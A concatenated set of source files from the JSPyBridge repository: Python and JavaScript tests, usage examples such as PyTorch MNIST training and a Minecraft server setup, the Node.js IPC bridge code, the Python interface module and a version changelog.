"blob_id": "709617afc6d4f4665b6138f4df2e0a43fc918edb", "content_id": "2a73022a7cb554b012666e9a01cd9c61220cd6aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2848, "license_type": "permissive", "max_line_length": 73, "num_lines": 125, "path": "/test/javascript/test_general.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "from javascript import require, console, On, Once, off, once, eval_js\n\ndef assertEquals(cond, val): assert cond == val\n\ndef test_require():\n chalk = require(\"chalk\")\n fs = require(\"fs\")\n print(\"Hello\", chalk.red(\"world!\"))\n test = require(\"./test.js\")\n\n\ndef test_classes():\n global demo\n DemoClass = require(\"./test.js\").DemoClass\n demo = DemoClass(\"blue\", {\"a\": 3}, lambda v: assertEquals(v, 3))\n # New psuedo operator\n demo2 = DemoClass.new(\"blue\", {\"a\": 3}, lambda v: assertEquals(v, 3))\n\n assert demo.ok()(1, 2, 3) == 6\n assert demo.toString() == '123!'\n assert demo.ok().x == 'wow'\n assert DemoClass.hello() == 'world'\n\ndef test_iter():\n DemoClass = require(\"./test.js\").DemoClass\n demo = DemoClass(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\n\n f = None\n for i in demo.array():\n print(\"i\", i)\n f = i\n assert f.a == 3\n\n expect = ['x', 'y', 'z']\n for key in demo.object():\n assert key == expect.pop(0)\n\ndef some_method(text):\n print(\"Callback called with\", text)\n assert text == 'It works !'\n\ndef test_callback():\n 
demo.callback(some_method)\n\ndef test_events():\n @On(demo, \"increment\")\n def handler(this, fn, num, obj):\n print(\"Handler caled\", fn, num, obj)\n if num == 7:\n off(demo, \"increment\", handler)\n\n @Once(demo, \"increment\")\n def onceIncrement(this, *args):\n print(\"Hey, I'm only called once !\")\n\n\n demo.increment()\n\ndef test_arrays():\n demo.arr[1] = 5\n demo.obj[1] = 5\n demo.obj[2] = some_method\n print(\"Demo array and object\", demo.arr, demo.obj)\n\n\ndef test_errors():\n try:\n demo.error()\n print(\"Failed to error\")\n exit(1)\n except Exception as e:\n print(\"OK, captured error\")\n\ndef test_valueOf():\n a = demo.arr.valueOf()\n print(\"A\", a)\n assert a[0] == 1\n assert a[1] == 5\n assert a[2] == 3\n print(\"Array\", demo.arr.valueOf())\n\ndef test_once():\n demo.wait()\n once(demo, \"done\")\n\ndef test_assignment():\n demo.x = 3\n\ndef test_eval():\n DemoClass = require(\"./test.js\").DemoClass\n demo = DemoClass(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\n pythonArray = []\n pythonObject = {\"var\": 3}\n\n # fmt: off\n print(eval_js('''\n for (let i = 0; i < 10; i++) {\n await pythonArray.append(i);\n pythonObject[i] = i;\n }\n pythonObject.var = 5;\n const fn = await demo.moreComplex()\n console.log('wrapped fn', await fn()); // Should be 3\n return 2\n '''))\n # fmt: on\n\n print(\"My var\", pythonObject)\n\ndef test_bigint():\n bigInt = eval_js('100000n')\n print(bigInt)\n\ntest_require()\ntest_classes()\ntest_iter()\ntest_callback()\ntest_events()\ntest_arrays()\ntest_errors()\ntest_valueOf()\ntest_once()\ntest_assignment()\ntest_eval()\ntest_bigint()" }, { "alpha_fraction": 0.650697648525238, "alphanum_fraction": 0.6709302067756653, "avg_line_length": 32.85826873779297, "blob_id": "560896cf9250ee435596434123fac7399f6c6644", "content_id": "2aac54b32a0d5ac3ce3936cb5ec2d619ce4b3e70", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4300, "license_type": "permissive", "max_line_length": 186, "num_lines": 127, "path": "/examples/javascript/pytorch-train.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/**\n * A PyTorch NN training example with the MNIST digit dataset using torchvision\n * Ported from https://github.com/pytorch/examples/tree/master/mnist\n */\nimport { py, PyClass, python } from 'pythonia'\npython.setFastMode(true) // bridge skips string serialization; need to use .toString() when console.logging now\nconst torch = await python('torch')\nconst nn = await python('torch.nn')\nconst F = await python('torch.nn.functional')\nconst optim = await python('torch.optim')\nconst { datasets, transforms } = await python('torchvision')\nconst lrs = await python('torch.optim.lr_scheduler')\n\nclass Net extends PyClass {\n constructor () {\n super(nn.Module)\n }\n\n async init () {\n this.conv1 = await nn.Conv2d(1, 32, 3, 1)\n this.conv2 = await nn.Conv2d(32, 64, 3, 1)\n this.dropout1 = await nn.Dropout(0.25)\n this.dropout2 = await nn.Dropout(0.5)\n this.fc1 = await nn.Linear(9216, 128)\n this.fc2 = await nn.Linear(128, 10)\n }\n\n async forward (x) {\n x = await this.conv1(x)\n x = await F.relu(x)\n x = await this.conv2(x)\n x = await F.relu(x)\n x = await F.max_pool2d(x, 2)\n x = await this.dropout1(x)\n x = await torch.flatten(x, 1)\n x = await this.fc1(x)\n x = await F.relu(x)\n x = await this.dropout2(x)\n x = await this.fc2(x)\n const output = await F.log_softmax$(x, { dim: 1 })\n return output\n }\n}\n\nasync function train 
(log_interval, dry_run, model, device, trainLoader, optimizer, epoch) {\n await model.train()\n for await (let [_batchIx, [data, target]] of await py.enumerate(trainLoader)) {\n data = await data.to(device)\n target = await target.to(device)\n await optimizer.zero_grad()\n const output = await model(await data)\n const loss = await F.nll_loss(output, await target)\n await loss.backward()\n await optimizer.step()\n const batchIx = await _batchIx\n if ((batchIx % log_interval) === 0) {\n console.log(`Train epoch: ${epoch} [${batchIx * await data.length}/${await trainLoader.dataset.length} (${100 * batchIx / await trainLoader.length}%)]\\tLoss: ${await loss.item()}`)\n }\n if (dry_run) break\n }\n}\n\nasync function test (model, device, testLoader) {\n await model.eval()\n let testLoss = 0\n let correct = 0\n\n await py.with(torch.no_grad(), async () => {\n for await (let [data, target] of testLoader) {\n data = await data.to(device)\n target = await target.to(device)\n const output = await model(data)\n const loss = await F.nll_loss$(output, await target, { reduction: 'sum' })\n testLoss += await loss.item()\n const pred = await output.argmax$({ dim: 1, keepdim: true })\n correct += await pred.eq(await target.view_as(pred)).then(k => k.sum()).then(k => k.item())\n }\n })\n\n testLoss /= await testLoader.dataset.length\n console.log(`\\nTest set: Average loss: ${testLoss}, Accuracy: ${correct}/${await testLoader.dataset.length} (${(100 * correct) / await testLoader.dataset.length}%)\\n`)\n}\n\nconst batch_size = 100\nconst test_batch_size = 1000\nconst epochs = 1\nconst lr = 1\nconst gamma = 0.7\nconst no_cuda = true\nconst dry_run = true\nconst seed = 1\nconst log_interval = 10\nconst save_model = true\n\nconst use_cuda = !no_cuda && await torch.cuda.is_available()\nawait torch.manual_seed(seed)\n\nconst device = use_cuda ? 
'cuda' : 'cpu'\n\nconst transform = await transforms.Compose([\n await transforms.ToTensor(),\n await transforms.Normalize([0.1306], [0.3081])\n])\n\nconst dataset1 = await datasets.MNIST$('./torch_data', { train: true, download: true, transform })\nconst dataset2 = await datasets.MNIST$('./torch_data', { train: false, download: true, transform })\n\nconst trainLoader = await torch.utils.data.DataLoader$(dataset1, { batch_size })\nconst testLoader = await torch.utils.data.DataLoader$(dataset2, { batch_size: test_batch_size })\n\nconst net = await Net.init()\nconst model = await net.to(device)\nconst optimizer = await optim.Adadelta$(await model.parameters(), { lr })\n\nconst scheduler = await lrs.StepLR$(optimizer, { step_size: 1, gamma })\n\nfor (let epoch = 0; epoch < epochs + 1; epoch++) {\n await train(log_interval, dry_run, model, device, trainLoader, optimizer, epoch)\n await test(model, device, testLoader)\n await scheduler.step()\n}\n\nif (save_model) {\n await torch.save(await model.state_dict(), 'mnist_cnn.pt')\n}\n\npython.exit()\n" }, { "alpha_fraction": 0.47229915857315063, "alphanum_fraction": 0.48268696665763855, "avg_line_length": 29.10416603088379, "blob_id": "9f3ac53303d31e122e4e2b11404a3a932c01d678", "content_id": "b6a3780fa485d185c4a1bf28816df08be22eec1e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1444, "license_type": "permissive", "max_line_length": 74, "num_lines": 48, "path": "/examples/python/nbt.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# Named Binary Tag (NBT) serialization format\nfrom javascript import require, globalThis\nJSON = globalThis.JSON\nnbt = require(\"prismarine-nbt\", \"latest\")\n\nprint(nbt.comp({\n 'Armor': nbt.list(nbt.comp([\n {\n 'Count': nbt.byte(1),\n 'Damage': nbt.short(0),\n 'Name': nbt.string('helmet')\n }\n ]))\n}))\n\n\ndef cross_encode():\n write = {\n \"type\": \"compound\",\n \"name\": \"\",\n \"value\": {\n \"FireworksItem\": {\n \"type\": \"compound\",\n \"value\": {\n \"FireworkColor\": {\"type\": \"byteArray\", \"value\": [11]},\n \"FireworkFade\": {\"type\": \"byteArray\", \"value\": []},\n \"FireworkFlicker\": {\"type\": \"int\", \"value\": -79},\n \"FireworkTrail\": {\"type\": \"int\", \"value\": 22},\n \"FireworkType\": {\"type\": \"byte\", \"value\": 0},\n },\n },\n \"customColor\": {\"type\": \"long\", \"value\": [-1, -75715]},\n },\n }\n\n\n tests = ['big', 'little']\n for test in tests:\n written = nbt.writeUncompressed(write, test)\n parsed = nbt.parse(written).parsed\n assert JSON.stringify(parsed) == JSON.stringify(write)\n \n for _test in tests:\n _written = nbt.writeUncompressed(parsed, _test)\n _ = nbt.parse(written)\n assert JSON.stringify(_.parsed) == JSON.stringify(write)\n\ncross_encode()" }, { "alpha_fraction": 0.5512424111366272, "alphanum_fraction": 0.5539906024932861, "avg_line_length": 30.078290939331055, "blob_id": "8d1454a895c9c19f76a714ca435ed679dafc33f2", "content_id": "f89f06b6767b5ac5e47d7519430cd2622ac2ed3d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8733, "license_type": "permissive", "max_line_length": 118, "num_lines": 281, "path": "/src/javascript/js/bridge.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "if (typeof process !== 'undefined' && parseInt(process.versions.node.split('.')[0]) < 14) {\n console.error('Your node version is currently', process.versions.node)\n 
console.error('Please update it to a version >= 14.x.x from https://nodejs.org/')\n process.exit(1)\n}\n/**\n * The JavaScript Interface for Python\n */\nconst util = require('util')\nconst { PyBridge } = require('./pyi')\nconst { $require } = require('./deps')\nconst { once } = require('events')\n\nconst debug = process.env.DEBUG?.includes('jspybridge') ? console.debug : () => { }\nconst colors = process.env.FORCE_COLOR !== '0'\n\nfunction getType (obj) {\n if (obj?.ffid) return 'py'\n if (typeof obj === 'function') {\n // Some tricks to check if we have a function, class or object\n if (obj.prototype) {\n // SO ... we COULD automatically call new for ES5 functions, but this gets complicated.\n // Since old ES5 classes can be called both with and without new, but with different\n // behavior. By forcing the new operator, we can no longer access ES5 classes variables\n // because of lack of support in proxy.py for functions with variables inside.. So instead\n // just don't call `new` for non-ES6 classes and let the user use the .new() psuedomethod.\n // The below could would check if the prototype has functions in it and assume class if so.\n // const props = Object.getOwnPropertyNames(obj.prototype)\n // if (props.length > 1) return 'class'\n // The below code just checks to see if we have an ES6 class (non-writable)\n const desc = Object.getOwnPropertyDescriptor(obj, 'prototype')\n if (!desc.writable) return 'class'\n }\n\n return 'fn'\n }\n if (typeof obj === 'bigint') return 'big'\n if (typeof obj === 'object') return 'obj'\n if (!isNaN(obj)) return 'num'\n if (typeof obj === 'string') return 'string'\n}\n\nclass Bridge {\n constructor (ipc) {\n // This is an ID that increments each time a new object is returned\n // to Python.\n this.ffid = 0\n // This contains a refrence map of FFIDs to JS objects.\n this.m = {\n 0: {\n console,\n require: $require,\n _require: require,\n globalThis,\n RegExp,\n once,\n needsNodePatches: () => {\n const [major, minor] = process.versions.node.split('.')\n if ((major == 14 && minor < 17) || (major == 15)) { // eslint-disable-line\n return true\n }\n return false\n },\n async evaluateWithContext ($block, $locals) {\n const $variables = Object.keys($locals)\n const $inputs = $variables.map(v => `$locals[\"${v}\"]`)\n const $code = ($block.split('\\n').length === 1 && !$block.includes('return ')) ? 'return ' + $block : $block\n const $finalCode = `(async (${$variables.join(', ')}) => { ${$code} })(${$inputs.join(', ')})`\n return await eval($finalCode)\n }\n }\n }\n this.ipc = ipc\n this.pyi = new PyBridge(this.ipc, this)\n this.eventMap = {}\n\n // ipc.on('message', this.onMessage)\n }\n\n addWeakRef (object, ffid) {\n const weak = new WeakRef(object)\n Object.defineProperty(this.m, ffid, {\n get () {\n return weak.deref()\n }\n })\n }\n\n async get (r, ffid, attr) {\n try {\n var v = await this.m[ffid][attr]\n var type = v.ffid ? 
'py' : getType(v)\n } catch (e) {\n return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n set (r, ffid, attr, [val]) {\n try {\n this.m[ffid][attr] = val\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n this.ipc.send({ r, key: '', val: true })\n }\n\n // Call property with new keyword to construct classes\n init (r, ffid, attr, args) {\n // console.log('init', r, ffid, attr, args)\n this.m[++this.ffid] = attr ? new this.m[ffid][attr](...args) : new this.m[ffid](...args)\n this.ipc.send({ r, key: 'inst', val: this.ffid })\n }\n\n // Call function with async keyword (also works with sync funcs)\n async call (r, ffid, attr, args) {\n try {\n if (attr) {\n var v = await this.m[ffid][attr].apply(this.m[ffid], args) // eslint-disable-line\n } else {\n var v = await this.m[ffid](...args) // eslint-disable-line\n }\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n const type = getType(v)\n // console.log('GetType', type, v)\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n // Fix for functions that return functions, use .call() wrapper\n // this.m[++this.ffid] = { call: v }\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n // called for debug in JS, print() in python via __str__\n async inspect (r, ffid) {\n const s = util.inspect(await this.m[ffid], { colors })\n this.ipc.send({ r, val: s })\n }\n\n // for __dict__ in python (used in json.dumps)\n async serialize (r, ffid) {\n const v = await this.m[ffid]\n this.ipc.send({ r, val: v.valueOf() })\n }\n\n async keys (r, ffid) {\n const v = await this.m[ffid]\n const keys = Object.getOwnPropertyNames(v)\n this.ipc.send({ r, keys })\n }\n\n free (r, ffid, attr, args) {\n for (const id of args) {\n delete this.m[id]\n }\n }\n\n process (r, args) {\n const made = {}\n let madeCount = 0\n const parse = input => {\n if (typeof input !== 'object') return\n for (const k in input) {\n const v = input[k]\n if (v && typeof v === 'object') {\n if (v.r && v.ffid === '') {\n ++this.ffid\n const proxy = this.pyi.makePyObject(this.ffid)\n this.m[this.ffid] = proxy\n made[input[k].r] = this.ffid\n input[k] = proxy\n madeCount++\n } else if (v.ffid) {\n input[k] = this.m[v.ffid]\n } else {\n parse(v)\n }\n } else {\n parse(v)\n }\n }\n }\n parse(args)\n // We only need to reply if we made some 
Proxies\n if (madeCount) this.ipc.send({ r, key: 'pre', val: made })\n }\n\n async onMessage ({ r, action, p, ffid, key, args }) {\n // console.debug('onMessage!', arguments, r, action)\n try {\n if (p) {\n this.process(r + 1, args)\n }\n await this[action](r, ffid, key, args)\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n }\n}\n\nObject.assign(util.inspect.styles, {\n bigint: 'yellow',\n boolean: 'yellow',\n date: 'magenta',\n module: 'underline',\n name: 'blueBright',\n null: 'bold',\n number: 'yellow',\n regexp: 'red',\n special: 'magentaBright', // (e.g., Proxies)\n string: 'green',\n symbol: 'blue',\n undefined: 'grey'\n})\n\nconst handlers = {}\n\nconst ipc = {\n send: data => {\n debug('js -> py', data)\n process.stderr.write(JSON.stringify(data) + '\\n')\n },\n writeRaw: (data, r, cb) => {\n debug('js -> py', data)\n handlers[r] = cb\n process.stderr.write(data + '\\n')\n },\n write (data, cb) {\n handlers[data.r] = cb\n this.send(data)\n }\n}\n\nconst bridge = new Bridge(ipc)\nprocess.stdin.on('data', data => {\n const d = String(data)\n debug('py -> js', d)\n for (const line of d.split('\\n')) {\n try { var j = JSON.parse(line) } catch (e) { continue } // eslint-disable-line\n if (j.c === 'pyi') {\n handlers[j.r]?.(j)\n } else {\n bridge.onMessage(j)\n }\n }\n})\n\nprocess.on('exit', () => {\n debug('** Node exiting')\n})\n// console.log('JS Started!')\n" }, { "alpha_fraction": 0.46529969573020935, "alphanum_fraction": 0.48422712087631226, "avg_line_length": 14.850000381469727, "blob_id": "612b2b4e3eb653c7f2a7a1811707ac7d73e0eee6", "content_id": "bb4e8213ca752eee2cf0b0d954d5fab911573d17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1268, "license_type": "permissive", "max_line_length": 69, "num_lines": 80, "path": "/test/javascript/test.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const { EventEmitter } = require('events')\n\nclass DemoClass extends EventEmitter {\n constructor (color, { a }) {\n super()\n this.color = color\n this.y = a\n this.arr = [1, 2, 3]\n this.obj = { a: 'ay', b: 'be', c: 'ce' }\n }\n\n increment () {\n this.y++\n setInterval(() => {\n this.emit('increment', () => 3, this.y++, { a: { y: this.y } })\n }, 20)\n }\n\n get () {\n return this.y\n }\n\n array () {\n return [[], 5, 6, 7, 8, { a: this.y }]\n }\n\n object () {\n return { x: 2, y: 3, z: 1 }\n }\n\n async other (clas) {\n return (await clas.y) + 2\n }\n\n moreComplex () {\n return () => 3\n }\n\n async callback (cb) {\n const { python } = globalThis.JSPyBridge\n const numpy = await python('math')\n console.log('callback from JS', cb, await numpy.sqrt(9))\n await cb('It works !')\n }\n\n complex () {\n return {\n y: () => 2,\n x: 3\n }\n }\n\n error () {\n throw Error('This should fail')\n }\n\n ok () {\n function someMethod (a, b, c) {\n return a + b + c\n }\n someMethod.x = 'wow'\n return someMethod\n }\n\n wait () {\n setTimeout(() => {\n this.emit('done')\n }, 400)\n }\n\n static hello () {\n return 'world'\n }\n\n toString () {\n return '123!'\n }\n}\n\nmodule.exports = { DemoClass }\n" }, { "alpha_fraction": 0.6158047914505005, "alphanum_fraction": 0.6336489319801331, "avg_line_length": 24.425926208496094, "blob_id": "5e650150ea21f22525faa5b27b19af3dcb913264", "content_id": "e050035277c7e953dcb62b5db26fdaa6e1f5d29e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2746, "license_type": 
"permissive", "max_line_length": 72, "num_lines": 108, "path": "/test/pythonia.test.mjs", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "// process.env.DEBUG = 1\nimport { py, python, PyClass } from 'pythonia'\nimport assert from 'assert'\nconst f = await python('./pythonia/pyImp.py')\nconst demo = await python('./pythonia/demo.py')\n\n// async function it (what, fn) {\n// console.log('it', what)\n// await fn()\n// }\n\nawait it('does function calls', async function () {\n console.log('ok', await f.add_inverse)\n assert.strictEqual(await f.add_inverse(3, 2), -5)\n const complex = await f.complex_num()\n console.log('complex', complex)\n console.log('real & complex', await complex.real, await complex.imag)\n console.log('FABC - this will fail', f.a.b.c)\n})\n\nawait it('declares classes', async function () {\n class MyClas extends PyClass {\n constructor () {\n super(demo.DemoClass, [4])\n }\n\n someMethod () {\n return 3\n }\n }\n\n await f.some_event(async (message, method) => {\n // Call a Python function passed as a paramater\n assert.strictEqual(message, 'from python')\n assert.strictEqual(await method(), 3)\n // console.log('Message', message, await method())\n }, await MyClas.init())\n})\n\nawait it('consumes classes', async function () {\n const { DemoClass, add } = demo\n const demoInst = await DemoClass(3)\n assert.ok(demoInst)\n console.log(demoInst)\n})\n\nawait it('catches errors', async function () {\n try {\n await demo.throw()\n } catch (e) {\n console.log('OK!')\n }\n})\n\nawait it('calls functions with special args', async function () {\n await demo.special$(1, 2, { kwarg1: 3, extra: 77, xx: Math.random() })\n})\n\nawait it('can add Python numbers', async function () {\n const num = py`3j`\n const num2 = py`2j`\n console.log('3 + 3', await py`3+3 + ${num} + ${num2}`)\n})\n\nawait it('can set variables', async function () {\n f.x[2] = 4\n console.log(await f.x)\n f.y.b = 'meow'\n console.log(await f.y)\n f.a.prop = 44\n assert.strictEqual(await f.a.prop, 44)\n // console.log(await f.a.prop)\n})\n\nawait it('can return primitive values', async function () {\n const arr = await f.x.valueOf()\n console.log(arr, typeof arr)\n assert.strictEqual(arr.toString(), '1,2,4')\n})\n\nawait it('can iterate asynchronously', async function () {\n const array = await f.x\n let v = 0\n for await (const entry of array) {\n console.log(entry)\n v += entry\n }\n assert.strictEqual(v, 7)\n})\n\nawait it('can iterate from Python', async function () {\n const a = await f.iter({ x: 1, y: 2, z: 3 })\n const b = await f.iter([1, 2, 3])\n assert.deepEqual(await a.valueOf(), ['x', 'y', 'z'])\n assert.deepEqual(await b.valueOf(), [1, 2, 3])\n})\n\nawait it('can recieve big numbers', async function () {\n const bigNumber = await py`2**63`\n console.log(bigNumber)\n assert.ok(bigNumber > 2 ** 60)\n})\n\n// process.exit(0)\n\nafter(() => {\n python.exit()\n})\n" }, { "alpha_fraction": 0.5597295165061951, "alphanum_fraction": 0.5627347826957703, "avg_line_length": 25.6200008392334, "blob_id": "f968c7b46b4c0d81ec840611be28ab783e6bf44f", "content_id": "d4a0df5a195232c4f2e5eb1ad31eac10ae1f9961", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1331, "license_type": "permissive", "max_line_length": 76, "num_lines": 50, "path": "/src/pythonia/interface.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "from Bridge import Bridge\nimport sys, os, socket, json\n\napiin = apiout = None\n\n\nclass 
Ipc:\n def queue(self, what):\n global apiout\n try:\n if type(what) == str:\n apiout.write(what + \"\\n\")\n else:\n apiout.write(json.dumps(what) + \"\\n\")\n apiout.flush()\n except Exception:\n # Quit if we are unable to write (is the parent process dead?)\n sys.exit(1)\n\n\nipc = Ipc()\nbridge = Bridge(ipc)\n\n# The communication stuffs\n# This is the communication thread which allows us to send and\n# recieve different messages at the same time.\ndef com_io():\n global apiin, apiout\n if sys.platform == \"win32\" or (\"NODE_CHANNEL_FD\" not in os.environ):\n apiin = sys.stdin\n apiout = sys.stderr\n else:\n fd = int(os.environ[\"NODE_CHANNEL_FD\"])\n api = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)\n apiin = api.makefile(\"r\")\n apiout = api.makefile(\"w\")\n ipc.readline = apiin.readline\n while True:\n data = apiin.readline()\n if not data:\n break\n if data[0] != \"{\":\n continue\n j = json.loads(data)\n bridge.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n\n\n# import cProfile\n# cProfile.run('com_io()', sort='time')\ncom_io()\n" }, { "alpha_fraction": 0.5595777034759521, "alphanum_fraction": 0.6033182740211487, "avg_line_length": 18.52941131591797, "blob_id": "8caf66e30d26018c165da8323e5b3abdc5d36591", "content_id": "0ae317560f4509427f4b1911c1c4c7449017e958", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "permissive", "max_line_length": 54, "num_lines": 34, "path": "/examples/python/flyingsquid.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time\nfrom javascript import require\nmcServer = require('flying-squid')\n\nmcServer.createMCServer({\n 'motd': 'A Minecraft Server \\nRunning flying-squid',\n 'port': 25565,\n 'max-players': 10,\n 'online-mode': True,\n 'logging': True,\n 'gameMode': 1,\n 'difficulty': 1,\n 'worldFolder': 'world',\n 'generation': {\n 'name': 'diamond_square',\n 'options': {\n 'worldHeight': 80\n }\n },\n 'kickTimeout': 10000,\n 'plugins': {\n\n },\n 'modpe': False,\n 'view-distance': 10,\n 'player-list-text': {\n 'header': 'Flying squid',\n 'footer': 'Test server'\n },\n 'everybody-op': True,\n 'max-entities': 100,\n 'version': '1.16.1'\n})\ntime.sleep(1000)" }, { "alpha_fraction": 0.7092555165290833, "alphanum_fraction": 0.7419517040252686, "avg_line_length": 38.779998779296875, "blob_id": "ffe2395c9f2ca2092440b2590b22b94c6c5e7e0a", "content_id": "15654789b375916e649f337b4152484a81cfc61b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1988, "license_type": "permissive", "max_line_length": 154, "num_lines": 50, "path": "/HISTORY.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "## 0.2.12\n* Iterate over non-arrays in JavaScript from Python [#29](https://github.com/extremeheat/JSPyBridge/pull/29)\n\n## 0.2.11\n* py: add an `--install <npm package>` option to the CLI to install internal packages outside of scripts\n\n## 0.2.10\n* Expose JSPyBridge on both sides of bridge. 
On Python via `os.JSPyBridge` and via `globalThis.JSPyBridge` in Node.js.\n* Customizable Node.js/Python binary path through `NODE_BIN` and `PYTHON_BIN` environment flags\n* js: (Windows) Fix Electron stdout crashing issue\n* py: RegExp is now exposed top-level for easier usability\n\n## 0.2.9\n* py: Improve error handling on Python process exit.\n\n## 0.2.7\n* py: Add new JavaScript expression evaluator\n\n## 0.2.6\n* py: Add new top-level `once` export, alias to Node.js's events function.\n\n## 0.2.5\n* py: Support Node versions 14+\n\n## 0.2.3\n* py: Add notebook and Google Colab support [#15](https://github.com/extremeheat/JSPyBridge/pull/15)\n* py: CLI now has a new --update flag to update internal Node.js dependencies. Now use --clean to reset the package store.\n\n## 0.2.3\n* Add support for `in` operator in Python code\n* IO/error handling updates [#14](https://github.com/extremeheat/JSPyBridge/pull/14)\n\n## 0.2.2\n* py: Add new CLI to clear the internal node_module cache; it can now be cleared with `python -m javascript clear`\n\n## 0.2.1\n* Initial release of bridge to access JavaScript from Python\n* py: Fix issue with dependency installer\n* py: Fix issue with error handler and issues with IPython\n\n## 0.2.0\n* Importing relative Python files now automatically adds the file's directory to the import path [#10](https://github.com/extremeheat/JSPyBridge/pull/10) \n* Automatically restart Python processes on a new Python import, if python was exit()'ed earlier\n* Fix relative imports on Windows not splitting \\ correctly\n* Fix readme typo (@Heath123) [#9](https://github.com/extremeheat/JSPyBridge/pull/9)\n* Documentation fixes\n\n## 0.1.0\n\n* Initial release of bridge to access Python from JavaScript" }, { "alpha_fraction": 0.6344212293624878, "alphanum_fraction": 0.6374735832214355, "avg_line_length": 31.265151977539062, "blob_id": "4f7ef1b14ed66296351f4f992a97fe50996ad499", "content_id": "6ec9d8e8ade8fb9b8bbb8f2f474dd796f77a5714", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4259, "license_type": "permissive", "max_line_length": 95, "num_lines": 132, "path": "/src/javascript/__init__.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# This file contains all the exposed modules\n
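# Typical downstream usage (illustrative sketch; \"chalk\" is only an example\n# npm package name):\n#   from javascript import require\n#   chalk = require(\"chalk\")\n#   print(chalk.red(\"hello\"))\nfrom . 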
import config, proxy, events\nimport threading, inspect, time, atexit, os, sys\n\n\ndef init():\n if config.event_loop:\n return # Do not start event loop again\n config.event_loop = events.EventLoop()\n config.event_thread = threading.Thread(target=config.event_loop.loop, args=(), daemon=True)\n config.event_thread.start()\n config.executor = proxy.Executor(config.event_loop)\n config.global_jsi = proxy.Proxy(config.executor, 0)\n atexit.register(config.event_loop.on_exit)\n\n if config.global_jsi.needsNodePatches():\n config.node_emitter_patches = True\n\n\ninit()\n\n\ndef require(name, version=None):\n calling_dir = None\n if name.startswith(\".\"):\n # Some code to extract the caller's file path, needed for relative imports\n try:\n namespace = sys._getframe(1).f_globals\n cwd = os.getcwd()\n rel_path = namespace[\"__file__\"]\n abs_path = os.path.join(cwd, rel_path)\n calling_dir = os.path.dirname(abs_path)\n except Exception:\n # In notebooks, the frame info above does not exist, so assume the CWD is the caller\n calling_dir = os.getcwd()\n\n return config.global_jsi.require(name, version, calling_dir, timeout=900)\n\n\nconsole = config.global_jsi.console # TODO: Remove this in 1.0\nglobalThis = config.global_jsi.globalThis\nRegExp = config.global_jsi.RegExp\n\n\ndef eval_js(js):\n frame = inspect.currentframe()\n rv = None\n try:\n local_vars = {}\n for local in frame.f_back.f_locals:\n if not local.startswith(\"__\"):\n local_vars[local] = frame.f_back.f_locals[local]\n rv = config.global_jsi.evaluateWithContext(js, local_vars, forceRefs=True)\n finally:\n del frame\n return rv\n\n\ndef AsyncTask(start=False):\n def decor(fn):\n fn.is_async_task = True\n t = config.event_loop.newTaskThread(fn)\n if start:\n t.start()\n\n return decor\n\n\nstart = config.event_loop.startThread\nstop = config.event_loop.stopThread\nabort = config.event_loop.abortThread\n\n
